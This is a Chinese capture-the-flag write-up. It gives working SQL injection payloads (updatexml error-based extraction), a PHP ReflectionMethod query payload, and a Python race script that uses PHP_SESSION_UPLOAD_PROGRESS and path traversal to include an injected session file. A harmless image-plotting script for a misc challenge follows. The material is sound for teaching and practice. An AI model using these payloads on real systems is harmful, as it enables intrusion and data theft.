Web

easy_sql

用无列名报错注入,猜测有flag表

1') || updatexml(1,concat(0x7e,(select * from(select * from flag a join (select * from flag)b using(no, id))c),0x7e),1) %23

可以爆出最后还有一个7ba99583-2ac3-40df-ac62-109330206d66列名。

直接拿flag

1') || updatexml(1,concat(0x7e,(select `7ba99583-2ac3-40df-ac62-109330206d66` from flag),0x7e),1) %23

easy_source

存在备份文件.index.php.swo

得到可控新建类和类方法。

然后利用php内置的ReflectionMethod类读取user类中的每个函数的注释。

payload在这

?rc=ReflectionMethod&ra=User&rb=a&rd=getDocComment

然后改rb分别查看其他函数就行了,爆出flag。

middle_source

<?php
// Challenge source as shown on the page: prints its own source, then
// includes a file whose path suffix is taken verbatim from the POST body.
highlight_file(__FILE__);
echo "your flag is in some file in /etc ";
// NOTE: assigned to $fielf (typo); the $field read further down is never
// set by this script.
$fielf=$_POST["field"];
// Only the prefix is fixed; the suffix is unsanitized POST input, so the
// final path (and thus what gets included) is caller-controlled.
// Mitigation: canonicalise with realpath() and refuse anything that does not
// stay under the base directory before including it.
$cf="/tmp/app_auth/cfile/".$_POST['cf'];

if(file_exists($cf)){
include $cf;
// Variable-variable echo: prints whichever variable $field names.
echo $$field;
exit;
}
else{
echo "";
exit;
}
?> your flag is in some file in /etc

目录扫描

扫描可以扫出来一个.listing,里面有一个you_can_seeeeeeee_me.php,打开发现是phpinfo的内容,但是disable_functions禁用了很多函数。

PHP_SESSION_UPLOAD_PROGRESS文件包含

我们可以使用PHP_SESSION_UPLOAD_PROGRESS进行文件包含,然后竞争进行rce,原理在这

写个脚本

import io
import requests
import threading

# Target and session identifiers shared by the writer and reader threads.
url = "url_here"  # placeholder: endpoint of the include page
# Session id sent as PHPSESSID; it fixes the sess_<sid> file name used below.
sid = 'a18'
# POST body for the reader threads: the include target, reached by traversing
# out of the fixed /tmp/app_auth/cfile/ prefix to the PHP session file of `sid`.
data = {"cf": f"../../../../../var/lib/php/sessions/eaheaeebeb/sess_{sid}"}


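def write(SESS):
    """Keep posting a dummy upload with the PHP_SESSION_UPLOAD_PROGRESS field set.

    While PHP processes the upload it records that field's value in the
    session file for ``sid``; that is the write half of the race whose
    result ``read`` polls for. The loop has no exit condition, so the
    function only ends when the process does. Reads the module-level
    ``url`` and ``sid``.

    Args:
        SESS: a ``requests.Session`` shared with the reader threads.
    """
    # Loop-invariant: the form field never changes between requests.
    payload = {
        'PHP_SESSION_UPLOAD_PROGRESS': '<?php var_dump(readfile("/etc/jhfhabcabi/ghdbcffecc/fffbeacjdg/hfjjaaaabg/fciaaaeehc/fl444444g"));?>',
    }
    while True:
        # Fresh in-memory file per request. A files= part is required: without
        # a real upload PHP never creates the session temp file (page tip).
        buf = io.BytesIO(b'a' * 1024 * 50)
        # The response itself is irrelevant here, only the server-side effect.
        SESS.post(url,
                  data=payload,
                  files={'file': ('1.txt', buf)},
                  cookies={'PHPSESSID': sid})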


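def read(SESS):
    """Poll the include endpoint until the raced session file shows up.

    Posts the module-level ``data`` (the traversal path to the session file)
    in an endless loop and prints the response as soon as it contains
    '1.txt', the upload file name that ``write`` pushes into the session
    record. ``event`` is cleared on a hit, but no loop in this script ever
    checks it, so clearing it does not stop any thread. Reads module-level
    ``url``, ``data`` and ``event``.

    Server-side this race only works because session.upload_progress is on
    and an attacker-influenced path reaches include; turning that option off
    and normalising the include path remove it.

    Args:
        SESS: a ``requests.Session`` shared with the writer threads.
    """
    while True:
        resp = SESS.post(url, data=data)
        # No hit: simply try again (the former empty else-branch).
        if '1.txt' in resp.text:
            print(resp.text)
            event.clear()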


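if __name__ == "__main__":
    # Set once at start and cleared by `read` on a hit; neither loop tests it,
    # so this flag does not influence any thread's lifetime.
    event = threading.Event()
    # `requests.Session()` is the documented constructor; `session()` is the
    # legacy alias for the same class.
    with requests.Session() as session:
        # 29 writer threads race 29 reader threads over one shared session.
        for _ in range(1, 30):
            threading.Thread(target=write, args=(session,)).start()
        for _ in range(1, 30):
            threading.Thread(target=read, args=(session,)).start()
        event.set()
    # NOTE(review): the with-block ends here while the threads still run, so
    # the shared session appears to be closed underneath them — confirm this
    # is intended.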

tips: POST必须要加files参数进行文件上传,不然session的临时文件是不会生成的。

Misc

robot

查看流量包可以发现类似坐标点的数值,全部提取出来然后用脚本生成像素图即可得到字符串。

from PIL import Image

# (x, y) pixel positions recovered from the packet capture; each pair becomes
# one black pixel on the canvas drawn below. Largest values seen here are
# x=356 and y=172, well inside the 500x500 image.
XYlocation = [[27, 36], [28, 35], [29, 35], [31, 35], [32, 35], [33, 35], [35, 35], [36, 35], [37, 35], [39, 34],
[40, 34], [41, 33], [42, 32], [43, 32], [45, 32], [47, 31], [48, 29], [49, 28], [49, 27], [50, 26],
[50, 25], [51, 23], [51, 22], [51, 21], [52, 20], [52, 19], [52, 18], [52, 17], [52, 16], [52, 15],
[51, 14], [50, 14], [49, 14], [48, 14], [47, 14], [46, 14], [45, 14], [44, 14], [43, 14], [42, 14],
[40, 14], [39, 14], [37, 14], [35, 14], [34, 14], [32, 14], [30, 14], [28, 14], [27, 14], [26, 14],
[25, 14], [24, 14], [23, 14], [22, 14], [21, 15], [20, 16], [19, 17], [18, 19], [18, 21], [18, 22],
[18, 23], [18, 24], [18, 26], [18, 27], [18, 28], [18, 30], [18, 32], [18, 33], [18, 34], [19, 37],
[21, 39], [21, 40], [22, 42], [24, 44], [24, 45], [26, 47], [27, 48], [28, 49], [29, 50], [30, 51],
[31, 52], [33, 53], [34, 53], [35, 54], [36, 54], [37, 54], [38, 54], [39, 54], [40, 54], [41, 54],
[44, 54], [46, 54], [48, 54], [50, 54], [52, 53], [53, 53], [54, 52], [55, 52], [56, 52], [58, 51],
[59, 50], [61, 49], [62, 49], [64, 47], [65, 47], [67, 46], [68, 46], [70, 45], [71, 44], [125, 23],
[125, 23], [124, 22], [123, 22], [121, 21], [118, 20], [115, 19], [113, 19], [112, 18], [111, 18],
[109, 17], [106, 16], [104, 16], [103, 16], [102, 15], [101, 15], [100, 15], [99, 15], [98, 15],
[97, 15], [96, 15], [95, 15], [94, 15], [93, 15], [92, 15], [91, 15], [89, 15], [87, 17], [85, 18],
[85, 19], [84, 21], [83, 21], [82, 22], [82, 23], [81, 24], [81, 26], [80, 28], [80, 29], [80, 31],
[80, 32], [79, 34], [79, 35], [79, 37], [79, 39], [79, 41], [79, 43], [79, 44], [79, 46], [79, 47],
[80, 48], [81, 49], [82, 50], [84, 50], [87, 51], [88, 51], [90, 51], [91, 51], [93, 51], [94, 51],
[97, 51], [100, 50], [101, 49], [102, 49], [103, 48], [105, 46], [106, 45], [108, 43], [109, 42],
[110, 41], [111, 39], [112, 38], [112, 36], [113, 34], [114, 33], [115, 32], [115, 31], [116, 30],
[117, 28], [118, 27], [118, 28], [117, 30], [116, 32], [115, 34], [115, 36], [114, 39], [114, 41],
[114, 43], [114, 45], [114, 47], [114, 48], [114, 50], [114, 52], [114, 53], [115, 54], [116, 55],
[117, 56], [118, 57], [120, 57], [122, 57], [124, 57], [126, 57], [128, 57], [131, 57], [133, 57],
[136, 57], [138, 57], [141, 57], [143, 56], [145, 55], [147, 53], [149, 52], [150, 52], [152, 50],
[153, 49], [155, 47], [156, 46], [157, 45], [212, 24], [212, 24], [213, 23], [211, 21], [210, 20],
[209, 19], [208, 18], [207, 17], [206, 16], [205, 15], [204, 15], [201, 14], [200, 14], [199, 14],
[197, 14], [196, 14], [195, 14], [193, 14], [191, 14], [189, 16], [188, 16], [187, 16], [186, 17],
[185, 17], [183, 18], [183, 20], [183, 21], [182, 22], [182, 23], [182, 24], [182, 25], [182, 26],
[182, 27], [182, 29], [183, 31], [184, 32], [186, 33], [187, 34], [188, 34], [189, 35], [190, 35],
[192, 36], [194, 37], [196, 37], [198, 38], [199, 38], [200, 38], [201, 38], [202, 39], [203, 39],
[204, 40], [207, 41], [207, 42], [208, 43], [208, 44], [208, 45], [208, 46], [208, 48], [208, 50],
[208, 51], [207, 53], [207, 54], [206, 56], [204, 58], [203, 60], [202, 61], [201, 62], [201, 63],
[200, 64], [199, 64], [198, 64], [197, 65], [196, 65], [195, 65], [193, 65], [192, 65], [190, 65],
[189, 65], [187, 65], [185, 65], [184, 65], [183, 65], [181, 64], [180, 63], [179, 63], [178, 62],
[177, 62], [175, 61], [174, 60], [173, 59], [243, 20], [243, 20], [244, 19], [244, 21], [244, 25],
[245, 26], [245, 29], [247, 32], [247, 34], [248, 36], [248, 37], [249, 39], [250, 40], [251, 42],
[251, 43], [252, 44], [254, 44], [256, 44], [258, 44], [260, 42], [262, 41], [263, 40], [265, 38],
[266, 35], [267, 32], [268, 30], [271, 27], [272, 25], [273, 22], [274, 21], [275, 20], [275, 19],
[274, 18], [274, 20], [272, 22], [271, 23], [271, 26], [268, 29], [266, 33], [266, 35], [265, 37],
[263, 40], [262, 42], [262, 44], [261, 47], [260, 49], [259, 51], [258, 55], [258, 56], [257, 58],
[255, 61], [254, 62], [253, 63], [253, 64], [252, 65], [251, 66], [250, 67], [249, 68], [248, 69],
[247, 70], [246, 71], [245, 72], [244, 73], [298, 64], [298, 64], [299, 65], [300, 65], [302, 65],
[304, 65], [306, 65], [308, 65], [309, 65], [312, 65], [315, 65], [317, 65], [319, 65], [322, 65],
[325, 65], [327, 65], [330, 65], [332, 65], [334, 66], [335, 66], [20, 103], [20, 104], [20, 107],
[20, 110], [20, 112], [20, 114], [20, 118], [19, 121], [18, 124], [17, 126], [17, 130], [17, 134],
[17, 137], [17, 139], [17, 142], [17, 143], [17, 146], [17, 147], [17, 149], [17, 150], [17, 149],
[17, 148], [17, 146], [18, 145], [18, 143], [19, 142], [20, 141], [20, 140], [21, 138], [21, 137],
[22, 135], [23, 134], [24, 132], [25, 131], [26, 129], [27, 128], [28, 127], [29, 126], [31, 125],
[32, 124], [32, 123], [34, 121], [35, 120], [37, 120], [38, 119], [40, 118], [41, 118], [43, 117],
[44, 116], [46, 115], [48, 115], [49, 114], [50, 113], [51, 113], [52, 112], [80, 121], [80, 121],
[79, 120], [78, 121], [77, 122], [77, 123], [77, 124], [76, 127], [75, 128], [74, 129], [73, 131],
[73, 132], [73, 133], [72, 135], [72, 136], [72, 137], [72, 138], [72, 139], [72, 140], [72, 142],
[72, 144], [72, 145], [73, 148], [74, 149], [77, 150], [78, 150], [80, 151], [81, 151], [82, 151],
[83, 151], [84, 151], [85, 151], [87, 151], [89, 151], [90, 151], [92, 150], [93, 150], [95, 149],
[97, 147], [98, 146], [99, 146], [100, 145], [101, 144], [102, 142], [102, 141], [104, 139], [104, 138],
[105, 136], [105, 135], [105, 133], [105, 132], [105, 131], [105, 129], [104, 128], [103, 126],
[102, 126], [101, 125], [98, 123], [96, 123], [95, 123], [93, 123], [92, 122], [90, 121], [89, 121],
[86, 120], [147, 98], [147, 98], [146, 99], [145, 100], [144, 103], [143, 104], [142, 105], [142, 106],
[142, 109], [142, 111], [142, 114], [141, 118], [140, 120], [139, 123], [138, 127], [138, 129],
[137, 133], [135, 135], [134, 137], [133, 139], [131, 142], [131, 143], [131, 145], [130, 146],
[129, 149], [128, 152], [128, 153], [127, 156], [127, 157], [126, 158], [127, 157], [129, 157],
[130, 156], [132, 156], [134, 155], [137, 153], [138, 152], [139, 151], [140, 150], [143, 149],
[144, 148], [145, 147], [146, 146], [147, 145], [149, 144], [149, 143], [150, 142], [151, 141],
[152, 140], [152, 139], [153, 138], [153, 137], [153, 136], [153, 135], [153, 134], [153, 133],
[152, 132], [151, 131], [150, 131], [149, 130], [147, 129], [186, 136], [186, 136], [183, 137],
[182, 138], [182, 139], [182, 140], [181, 142], [179, 144], [179, 145], [179, 147], [178, 149],
[177, 150], [177, 151], [177, 152], [177, 154], [177, 156], [177, 157], [177, 158], [178, 160],
[179, 161], [180, 162], [181, 163], [182, 164], [184, 164], [186, 164], [187, 164], [188, 164],
[190, 163], [191, 162], [192, 162], [194, 160], [196, 159], [197, 158], [197, 156], [198, 155],
[200, 153], [200, 152], [201, 150], [201, 149], [201, 148], [201, 147], [201, 145], [201, 144],
[201, 142], [201, 141], [201, 139], [201, 138], [200, 136], [199, 135], [198, 135], [197, 135],
[196, 135], [195, 135], [193, 135], [192, 135], [190, 135], [189, 135], [223, 167], [223, 167],
[224, 167], [226, 167], [228, 167], [229, 167], [232, 167], [233, 167], [234, 167], [235, 167],
[237, 167], [238, 167], [240, 167], [241, 167], [243, 167], [244, 167], [246, 167], [247, 167],
[250, 168], [251, 168], [252, 168], [253, 168], [254, 168], [269, 135], [271, 136], [273, 138],
[275, 140], [276, 141], [278, 143], [280, 145], [282, 147], [284, 149], [285, 150], [288, 152],
[289, 153], [291, 154], [293, 156], [294, 157], [296, 159], [297, 160], [298, 161], [299, 162],
[300, 136], [299, 136], [297, 137], [296, 138], [294, 141], [294, 142], [293, 144], [293, 145],
[292, 148], [291, 149], [290, 151], [288, 153], [288, 155], [287, 156], [286, 157], [285, 159],
[284, 160], [283, 161], [282, 162], [281, 163], [280, 164], [279, 165], [327, 142], [328, 143],
[330, 145], [332, 148], [333, 149], [335, 151], [337, 154], [339, 156], [341, 158], [342, 159],
[345, 160], [347, 161], [348, 162], [350, 164], [351, 165], [352, 166], [355, 168], [356, 169],
[351, 143], [350, 143], [348, 144], [347, 144], [346, 145], [343, 148], [341, 150], [339, 152],
[336, 155], [333, 158], [330, 159], [327, 162], [325, 165], [323, 167], [322, 168], [319, 170],
[317, 171], [316, 171], [314, 172], [313, 172]]

# White 500x500 canvas; every coordinate in XYlocation fits inside it.
im = Image.new('RGB', (500, 500), 'white')

# Paint one black pixel per (x, y) pair.
for x, y in XYlocation:
    im.putpixel((x, y), (0, 0, 0))

# Write the result once all points are drawn.
im.save('flag.png')

得到图片

最后根据题目提示转MD5再提交就可以了。